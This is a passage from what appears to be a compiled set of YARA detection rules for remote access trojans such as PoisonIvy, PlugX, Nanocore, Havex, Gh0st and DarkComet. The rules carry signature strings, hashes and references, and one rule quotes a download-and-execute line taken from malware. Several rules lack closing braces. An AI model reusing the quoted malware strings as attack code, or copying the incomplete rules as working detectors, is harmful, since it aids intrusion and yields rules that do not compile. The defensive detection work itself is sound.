   		$a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C }    
   		   
   	condition:   
   		$a   
rule PoisonIvy_2   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/PoisonIvy"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
       strings:   
       	$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}   
           $string1 = "CONNECT %s:%i HTTP/1.0"   
           $string2 = "ws2_32"   
           $string3 = "cks=u"   
           $string4 = "thj@h"   
           $string5 = "advpack"   
       condition:   
   		$stub at 0x1620 and all of ($string*) or (all of them)   
rule PoisonIvy_Generic_3 {   
   	meta:   
   		description = "PoisonIvy RAT Generic Rule"   
   		author = "Florian Roth"   
   		date = "2015-05-14"   
   		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"   
   	strings:   
   		$k1 = "Tiger324{" fullword ascii   
   		   
   		$s2 = "WININET.dll" fullword ascii   
   		$s3 = "mscoree.dll" fullword wide   
   		$s4 = "WS2_32.dll" fullword   
   		$s5 = "Explorer.exe" fullword wide   
   		$s6 = "USER32.DLL"   
   		$s7 = "CONOUT$"   
   		$s8 = "login.asp"   
   		   
   		$h1 = "HTTP/1.0"   
   		$h2 = "POST"   
   		$h3 = "login.asp"   
   		$h4 = "check.asp"   
   		$h5 = "result.asp"   
   		$h6 = "upload.asp"   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and   
   			(    
   				$k1 or all of ($s*) or all of ($h*)   
   			)   
// https://otx.alienvault.com/pulse/59394a42f3b08d6814e96168
rule rtf_Kaba_jDoe   
   {   
      
   meta:   
       author = "@patrickrolsen"   
       maltype = "APT.Kaba"   
       filetype = "RTF"   
       version = "0.1"   
       description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"   
       date = "2013-12-10"   
      
   strings:   
       $magic1 = { 7b 5c 72 74 30 31 } // {\rt01   
       $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1   
       $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3   
       $author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"   
       $author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"   
       $string1 = { 44 30 [16] 43 46 [23] 31 31 45 }   
      
   condition:   
       ($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1   
rule PlugXStrings : PlugX Family   
   {   
       meta:   
           description = "PlugX Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-12"   
              
       strings:   
           $BootLDR = "boot.ldr" wide ascii   
           $Dwork = "d:\\work" nocase   
           $Plug25 = "plug2.5"   
           $Plug30 = "Plug3.0"   
           $Shell6 = "Shell6"   
            
       condition:   
           $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))   
rule plugX : rat   
   {   
   	meta:   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		description = "PlugX RAT"   
   		date = "2014-05-13"   
   		filetype = "memory"   
   		version = "1.0"    
   		ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"   
   		   
   	strings:   
   		$v1a = { 47 55 4C 50 00 00 00 00 }   
   		$v1b = "/update?id=%8.8x"    
   		$v1algoa = { BB 33 33 33 33 2B }    
   		$v1algob = { BB 44 44 44 44 2B }    
   		$v2a = "Proxy-Auth:"    
   		$v2b = { 68 A0 02 00 00 }    
   		$v2k = { C1 8F 3A 71 }    
   		   
   	condition:    
   		$v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))   
rule PlugX_mw   
   {    
   	meta:   
   		maltype = "plugX"   
   		author = "https://github.com/reed1713"   
   		reference = "http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html"   
   		description = "Malware creates a randomized directory within the appdata roaming directory and launches the malware. Should see multiple events for create process rundll32.exe and iexplorer.exe as it repeatedly uses iexplorer to launch the rundll32 process."   
   	strings:   
   		$type="Microsoft-Windows-Security-Auditing"   
   		$eventid="4688"   
   		$data=/\\AppData\\Roaming\\[0-9]{9,12}\VMwareCplLauncher\.exe/   
      
   		$type1="Microsoft-Windows-Security-Auditing"   
   		$eventid1="4688"   
   		$data1="\\Windows\\System32\\rundll32.exe"   
      
   		$type2="Microsoft-Windows-Security-Auditing"   
   		$eventid2="4688"   
   		$data2="Program Files\\Internet Explorer\\iexplore.exe"   
   	condition:   
   		all of them   
// https://otx.alienvault.com/pulse/57a11c4c31564d04cae119fb
rule RAT_Orcus    
   {   
      
       meta:   
           author = " J from THL <j@techhelplist.com> with thx to MalwareHunterTeam"   
           date = "2017/01"   
           reference = "https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/"   
           version = 1   
           maltype = "RAT"   
           filetype = "memory"   
      
       strings:   
           $text01 = "Orcus.CommandManagement"   
           $text02 = "Orcus.Commands."   
           $text03 = "Orcus.Config."   
           $text04 = "Orcus.Connection."   
           $text05 = "Orcus.Core."   
           $text06 = "Orcus.exe"   
           $text07 = "Orcus.Extensions."   
           $text08 = "Orcus.InstallationPromptForm"   
           $text09 = "Orcus.MainForm."   
           $text10 = "Orcus.Native."   
           $text11 = "Orcus.Plugins."   
           $text12 = "orcus.plugins.dll"   
           $text13 = "Orcus.Properties."   
           $text14 = "Orcus.Protection."   
           $text15 = "Orcus.Share."   
           $text16 = "Orcus.Shared"   
           $text17 = "Orcus.StaticCommands"   
           $text18 = "Orcus.Utilities."   
           $text19 = "\\Projects\\Orcus\\Source\\Orcus."   
           $text20 = ".orcus.plugins.dll.zip"   
           $text21 = ".orcus.shared.dll.zip"   
           $text22 = ".orcus.shared.utilities.dll.zip"   
           $text23 = ".orcus.staticcommands.dll.zip"   
           $text24 = "HvncCommunication"   
           $text25 = "HvncAction"   
           $text26 = "hvncDesktop"   
           $text27 = ".InstallationPromptForm"   
           $text28 = "RequestKeyLogCommand"   
           $text29 = "get_KeyLogFile"   
           $text30 = "LiveKeyloggerCommand"   
           $text31 = "ORCUS.STATICCOMMANDS, VERSION="   
           $text32 = "PrepareOrcusFileToRemove"   
           $text33 = "ConvertFromOrcusValueKind"   
      
       condition:   
           13 of them   
// https://otx.alienvault.com/pulse/595d080daa0104746aa1bc16
rule NetWiredRC_B : RAT   
   {   
   	meta:   
   		description = "NetWiredRC"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2014-12-23"   
   		filetype = "memory"   
   		version = "1.1"    
      
   	strings:   
   		$mutex = "LmddnIkX"   
      
   		$str1 = "%s.Identifier"   
   		$str2 = "%d:%I64u:%s%s;"   
   		$str3 = "%s%.2d-%.2d-%.4d"   
   		$str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"   
   		$str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"   
   		   
   		$klg1 = "[Backspace]"   
   		$klg2 = "[Enter]"   
   		$klg3 = "[Tab]"   
   		$klg4 = "[Arrow Left]"   
   		$klg5 = "[Arrow Up]"   
   		$klg6 = "[Arrow Right]"   
   		$klg7 = "[Arrow Down]"   
   		$klg8 = "[Home]"   
   		$klg9 = "[Page Up]"   
   		$klg10 = "[Page Down]"   
   		$klg11 = "[End]"   
   		$klg12 = "[Break]"   
   		$klg13 = "[Delete]"   
   		$klg14 = "[Insert]"   
   		$klg15 = "[Print Screen]"   
   		$klg16 = "[Scroll Lock]"   
   		$klg17 = "[Caps Lock]"   
   		$klg18 = "[Alt]"   
   		$klg19 = "[Esc]"   
   		$klg20 = "[Ctrl+%c]"   
      
   	condition:    
   		$mutex or (1 of ($str*) and 1 of ($klg*))   
// https://otx.alienvault.com/pulse/571931ffc1492d015b14bb6a
rule Nanocore_RAT_Gen_1 {   
   	meta:   
   		description = "Detetcs the Nanocore RAT and similar malware"   
   		author = "Florian Roth"   
   		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"   
   		date = "2016-04-22"   
   		score = 70   
   		hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"   
   	strings:   
   		$x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii   
   		$x2 = "RunPE1" fullword ascii   
   		$x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii   
   		$x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii   
   		$x5 = "Monitorinjection" fullword ascii   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )   
rule Nanocore_RAT_Gen_2 {   
   	meta:   
   		description = "Detetcs the Nanocore RAT"   
   		author = "Florian Roth"   
   		score = 100   
   		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"   
   		date = "2016-04-22"   
   		hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"   
   	strings:   
   		$x1 = "NanoCore.ClientPluginHost" fullword ascii   
   		$x2 = "IClientNetworkHost" fullword ascii   
   		$x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )   
rule Nanocore_RAT_Sample_1 {   
   	meta:   
   		description = "Detetcs a certain Nanocore RAT sample"   
   		author = "Florian Roth"   
   		score = 75   
   		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"   
   		date = "2016-04-22"   
   		hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"   
   	strings:   
   		$x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide   
   		$x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii   
   		$x3 = "popthatkitty.Resources.resources" fullword ascii   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 900KB and ( 1 of ($x*) ) ) or ( all of them )   
rule Nanocore_RAT_Sample_2 {   
   	meta:   
   		description = "Detetcs a certain Nanocore RAT sample"   
   		author = "Florian Roth"   
   		score = 75   
   		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"   
   		date = "2016-04-22"   
   		hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"   
   	strings:   
   		$s1 = "U4tSOtmpM" fullword ascii   
   		$s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" fullword wide   
   		$s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 40KB and all of ($s*)   
// https://otx.alienvault.com/pulse/57c84d7a6eba7e0135d187fc
rule Meterpreter_Reverse_Tcp {    
     meta: // This is the standard backdoor/RAT from Metasploit, could be used by any actor    
       author = "chort (@chort0)"    
       description = "Meterpreter reverse TCP backdoor in memory. Tested on Win7x64."    
     strings:    
       $a = { 4d 45 54 45 52 50 52 45 54 45 52 5f 54 52 41 4e 53 50 4f 52 54 5f 53 53 4c [32-48] 68 74 74 70 73 3a 2f 2f 58 58 58 58 58 58 } // METERPRETER_TRANSPORT_SSL  https://XXXXXX    
       $b = { 4d 45 54 45 52 50 52 45 54 45 52 5f 55 41 } // METERPRETER_UA    
       $c = { 47 45 54 20 2f 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2f 31 2e 30 } // GET /123456789 HTTP/1.0    
       $d = { 6d 65 74 73 72 76 2e 64 6c 6c [2-4] 52 65 66 6c 65 63 74 69 76 65 4c 6f 61 64 65 72 } // metsrv.dll  ReflectiveLoader    
          
     condition:    
       $a or (any of ($b, $d) and $c)    
     }
// https://otx.alienvault.com/pulse/5671dc9667db8c3f8b467f1d
rule apt_win32_dll_rat_hiZor_RAT: RAT   
   {   
   	meta:   
       description = "Detects hiZor RAT"   
   		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"   
   		hash2 = "d9821468315ccd3b9ea03161566ef18e"   
   		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"   
       ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"   
       ref2 = "https://github.com/Neo23x0/Loki/blob/b187ed063d73d0defc6958100ca7ad04aa77fc12/signatures/apt_hizor_rat.yar"   
       reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"   
   	strings:   
   		// Part of the encoded User-Agent = Mozilla   
   		$s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }   
      
   		// XOR to decode User-Agent after string stacking 0x10001630   
   		$s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }   
      
   		// XOR with 0x2E - 0x10002EF6   
   		$s3 = { 80 [2] 2e 40 3b ?? 72 ?? }   
      
   		$s4 = "CmdProcessExited" wide ascii   
   		$s5 = "rootDir" wide ascii   
   		$s6 = "DllRegisterServer" wide ascii   
   		$s7 = "GetNativeSystemInfo" wide ascii   
   		$s8 = "%08x%08x%08x%08x" wide ascii   
   	condition:   
   		(uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them)   
rule apt_win32_dll_rat_1a53b0cp32e46g0qio7   
   {   
   	meta:   
   		author = "https://www.fidelissecurity.com/"   
           	info = "Indicators for FTA-1020"   
   		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"   
   		hash2 = "d9821468315ccd3b9ea03161566ef18e"   
   		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"   
   		reference = "https://github.com/fideliscyber"   
   	strings:   
       	// Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0;rv:11.0) like Gecko   
   		$ = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 } // offset 10001566   
   	// Software\Microsoft\Windows\CurrentVersion\Run   
          $ = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 } // 10003D09   
   	$ = { 66 [4-7] 0d 40 83 f8 44 7c ?? }   
          // xor		word ptr [ebp+eax*2+var_5C], 14h   
   	// inc		eax   
   	// cmp     	eax, 14h   
          // Loop to decode a static string. It reveals the "1a53b0cp32e46g0qio9" static string sent in the beacon   
   	$ = { 66 [4-7] 14 40 83 f8 14 7c ?? } // 100017F0   
   	$ = { 66 [4-7] 56 40 83 f8 2d 7c ?? } // 10003621   
   	$ = { 66 [4-7] 20 40 83 f8 1a 7c ?? } // 10003640   
   	$ = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? } //  10003930   
   	$ = "%08x%08x%08x%08x" wide ascii   
   	$ = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii   
      
   	condition:   
   	(uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them)   
// https://otx.alienvault.com/pulse/5977c131481b4c6685f5f810
rule Indetectables_RAT: RAT {   
   	meta:   
   		description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"   
   		author = "Florian Roth"   
   		reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"   
   		date = "2015-10-01"   
   		super_rule = 1   
   		hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"   
   		hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"   
   		hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"   
   	strings:   
   		$s1 = "Coded By M3" fullword wide   
   		$s2 = "Stub Undetector M3" fullword wide   
   		$s3 = "www.webmenegatti.com.br" wide   
   		$s4 = "M3n3gatt1" fullword wide   
   		$s5 = "TheMisterFUD" fullword wide   
   		$s6 = "KillZoneKillZoneKill" fullword ascii   
   		$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii   
   		$s8 = "M3_F_U_D_M3" ascii   
   		$s9 = "M3n3gatt1hack3r" fullword wide   
   		$s9a = "M3n3gatt1hack3r" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 5000KB and 1 of them   
rule BergSilva_Malware : RAT {   
   	meta:   
   		description = "Detects a malware from the same author as the Indetectables RAT"   
   		author = "Florian Roth"   
   		date = "2015-10-01"   
   		super_rule = 1   
   		hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"   
   		hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"   
   	strings:   
   		$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide   
   		$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide   
      
   		$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide   
   		$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide   
   		$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide   
   		$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide   
   		$s5 = "https://dl.dropbox.com/u/105015858" wide   
   	condition:   
   		uint16(0) == 0x5a4d and ( 1 of ($x*) or 2 of ($s*) )   
// https://otx.alienvault.com/pulse/58cf04d405e7853a71c2fac1
rule SANS_ICS_Cybersecurity_Challenge_400_Havex_Memdump : memory   
   	{   
   	meta:   
   		description = "Detects Havex Windows process executable from memory dump"   
   		date = "2015-12-2"   
   		author = "Chris Sistrunk"   
   		hash = "8065674de8d79d1c0e7b3baf81246e7d"   
   	strings:   
   		$magic = { 4d 5a }	   
   	   
   	        $s1 = "~tracedscn.yls" fullword wide   
   		$s2 = "[!]Start" fullword wide   
   		$s3 = "[+]Get WSADATA" fullword wide   
   		$s4 = "[-]Can not get local ip" fullword wide   
   		$s5 = "[+]Local:" fullword wide   
   		$s6 = "[-]Threads number > Hosts number" fullword wide   
   		$s7 = "[-]Connection error" fullword wide   
   		   
   		$x1 = "bddd4e2b84fa2ad61eb065e7797270ff.exe" fullword wide   
   	condition:   
   	    $magic at 0 and ( 3 of ($s*) or $x1 )   
rule Havex_Trojan_PHP_Server   
   {   
       meta:   
           Author      = "Florian Roth"   
           Date        = "2014/06/24"   
           Description = "Detects the PHP server component of the Havex RAT"   
           Reference   = "www.f-secure.com/weblog/archives/00002718.html"   
      
       strings:   
           $s1 = "havex--></body></head>"   
           $s2 = "ANSWERTAG_START"   
           $s3 = "PATH_BLOCKFILE"   
      
       condition:   
           all of them   
rule Win32OPCHavex   
   {   
       meta:   
           Author      = "BAE Systems"   
           Date        = "2014/06/23"   
           Description = "Rule for identifying OPC version of HAVEX"   
           Reference   = "www.f-secure.com/weblog/archives/00002718.html"   
      
       strings:   
           $mzhdr = "MZ"   
           $dll = "7CFC52CD3F87.dll"   
           $a1 = "Start finging of LAN hosts..." wide   
           $a2 = "Finding was fault. Unexpective error" wide   
           $a3 = "Was found %i hosts in LAN:" wide   
           $a4 = "Hosts was't found." wide   
           $a5 = "Start finging of OPC Servers..." wide   
           $a6 = "Was found %i OPC Servers." wide   
           $a7 = "OPC Servers not found. Programm finished" wide   
           $a8 = "%s[%s]!!!EXEPTION %i!!!" wide   
           $a9 = "Start finging of OPC Tags..." wide   
      
       condition:   
           $mzhdr at 0 and ($dll or (any of ($a*)))   
rule Win32FertgerHavex   
   {   
       meta:   
           Author      = "BAE Systems"   
           Date        = "2014/06/23"   
           Description = "Rule for identifying Fertger version of HAVEX"   
           Reference   = "www.f-secure.com/weblog/archives/00002718.html"   
      
       strings:   
           $mz = "MZ"   
           $a1="\\\\.\\pipe\\mypipe-f" wide   
           $a2="\\\\.\\pipe\\mypipe-h" wide   
           $a3="\\qln.dbx" wide   
           $a4="*.yls" wide   
           $a5="\\*.xmd" wide   
           $a6="fertger" wide   
           $a7="havex"   
          
       condition:   
           $mz at 0 and 3 of ($a*)    
// https://otx.alienvault.com/pulse/5640d95e67db8c7a156aeaaa
rule MW_gholee_v1 : v1   
   {   
   meta:   
       Author = "@GelosSnake"   
       description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"   
       date = "2014-08"   
       maltype = "Remote Access Trojan"   
       sample_filetype = "dll"   
       hash0 = "48573a150562c57742230583456b4c02"   
         
   strings:   
       $a = "sandbox_avg10_vc9_SP1_2011"   
       $b = "gholee"   
         
   condition:   
       all of them   
rule MW_gholee_v2 : v2   
   {   
   meta:   
           author = "@GelosSnake"   
           date = "2015-02-12"   
           description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"   
           hash0 = "05523761ca296ec09afdf79477e5f18d"   
           hash1 = "08e424ac42e6efa361eccefdf3c13b21"   
           hash2 = "5730f925145f1a1cd8380197e01d9e06"   
           hash3 = "73461c8578dd9ab86d42984f30c04610"   
           sample_filetype = "dll"   
   strings:   
           $string0 = "RichHa"   
           $string1 = "         (((((                  H" wide   
           $string2 = "1$1,141<1D1L1T1\\1d1l1t1"   
           $string3 = "<8;$O' "   
           $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"   
           $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"   
           $string6 = "urn:schemas-microsoft-com:asm.v1"   
           $string7 = "8.848H8O8i8s8y8"   
           $string8 = "wrapper3" wide   
           $string9 = "pwwwwwwww"   
           $string10 = "Sunday"   
           $string11 = "YYuTVWh"   
           $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"   
           $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"   
           $string15 = "wrapper3 Version 1.0" wide   
           $string16 = "77A779"   
           $string17 = "<C<G<M<R<X<"   
           $string18 = "9 9-9N9X9s9"   
   condition:   
           18 of them   
rule gholeeV2   
   {   
      meta:   
   	Author = "@GelosSnake"   
   	Date = "2015-02-12"   
       	Description = "Gholee first discovered variant "   
   	Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"    
      
      strings:   
   	$string0 = "RichHa"   
   	$string1 = "         (((((                  H" wide   
   	$string2 = "1$1,141<1D1L1T1\\1d1l1t1"   
   	$string3 = "<8;$O' "   
   	$string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"   
   	$string5 = "jYPQTVTSkllZTTXRTUiHceWda/"   
   	$string6 = "urn:schemas-microsoft-com:asm.v1"   
   	$string7 = "8.848H8O8i8s8y8"   
   	$string8 = "wrapper3" wide   
   	$string9 = "pwwwwwwww"   
   	$string10 = "Sunday"   
   	$string11 = "YYuTVWh"   
   	$string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"   
   	$string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"   
   	$string15 = "wrapper3 Version 1.0" wide   
   	$string16 = "77A779"   
   	$string17 = "<C<G<M<R<X<"   
   	$string18 = "9 9-9N9X9s9"   
      
       condition:   
   	18 of them   
rule gholeeV1   
   {   
       meta:   
   	 Author = "@GelosSnake"   
       	 Date = "2014/08"   
       	 Description = "Gholee first discovered variant "   
   	 Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"    
      
       strings:   
       	 $a = "sandbox_avg10_vc9_SP1_2011"   
       	 $b = "gholee"   
      
       condition:   
       	 all of them   
// https://otx.alienvault.com/pulse/581916f4aa96ef71368c8e47
rule Gh0st : RAT   
   {   
       meta:   
           description = "Gh0st"   
   	author = "botherder https://github.com/botherder"   
      
       strings:   
           $ = /(G)host/   
           $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/   
           $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/   
           $ = /(%)s\\shell\\open\\command/   
           $ = /(G)etClipboardData/   
           $ = /(W)riteProcessMemory/   
           $ = /(A)djustTokenPrivileges/   
           $ = /(W)inSta0\\Default/   
           $ = /(#)32770/   
           $ = /(#)32771/   
           $ = /(#)32772/   
           $ = /(#)32774/   
      
       condition:   
           all of them   
rule gh0st   
      
   {   
      
   meta:   
   	author = "https://github.com/jackcr/"   
      
      strings:   
         $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }   
         $b = "Gh0st Update"   
      
      condition:   
         any of them   
      
rule APT_WIN_Gh0st_ver : RAT   
   {   
   meta:   
      author = "@BryanNolen"   
      date = "2012-12"   
      type = "APT"   
      version = "1.1"   
      ref = "Detection of Gh0st RAT server DLL component"   
      ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"   
    strings:     
      $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"   
      $capability = "GetClipboardData"   
      $capability1 = "capCreateCaptureWindowA"   
      $capability2 = "CreateRemoteThread"   
      $capability3 = "WriteProcessMemory"   
      $capability4 = "LsaRetrievePrivateData"   
      $capability5 = "AdjustTokenPrivileges"   
      $function = "ResetSSDT"   
      $window = "WinSta0\\Default"   
      $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64}    /* $magic = "Gh0st" */   
    condition:   
      all of them   
// https://otx.alienvault.com/pulse/58da29d4a8a1d40414b5f839
rule CrowdStrike_CSIT_14003_03 : installer    
      
   {    
      
          meta:    
      
                copyright = "CrowdStrike, Inc"    
      
                description = "Flying Kitten Installer"    
      
                version = "1.0"    
      
                actor = "FLYING KITTEN"    
      
                in_the_wild = true    
      
          strings:    
      
                $exename = "IntelRapidStart.exe"    
      
                $confname = "IntelRapidStart.exe.config"    
      
                $cabhdr = { 4d 53 43 46 00 00 00 00 }    
      
          condition:    
      
                all of them    
      
rule FlyingKitten : rat   
   {   
       meta:   
           Author      = "CrowdStrike, Inc"   
           Date        = "2014/05/13"   
           Description = "Flying Kitten RAT"   
           Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"   
      
       strings:   
           $classpath = "Stealer.Properties.Resources.resources"   
           $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"   
      
       condition:   
           all of them and uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x4550 and uint16(uint32(0x3C) + 0x16) & 0x2000 == 0 and ((uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0) or (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0))    
      
// https://otx.alienvault.com/pulse/5567543db45ff5037f003f9d
rule DarkComet_3 : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/DarkComet"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		// Versions 2x   
   		$a1 = "#BOT#URLUpdate"   
   		$a2 = "Command successfully executed!"   
   		$a3 = "MUTEXNAME" wide   
   		$a4 = "NETDATA" wide   
   		// Versions 3x & 4x & 5x   
   		$b1 = "FastMM Borland Edition"   
   		$b2 = "%s, ClassID: %s"   
   		$b3 = "I wasn't able to open the hosts file"   
   		$b4 = "#BOT#VisitUrl"   
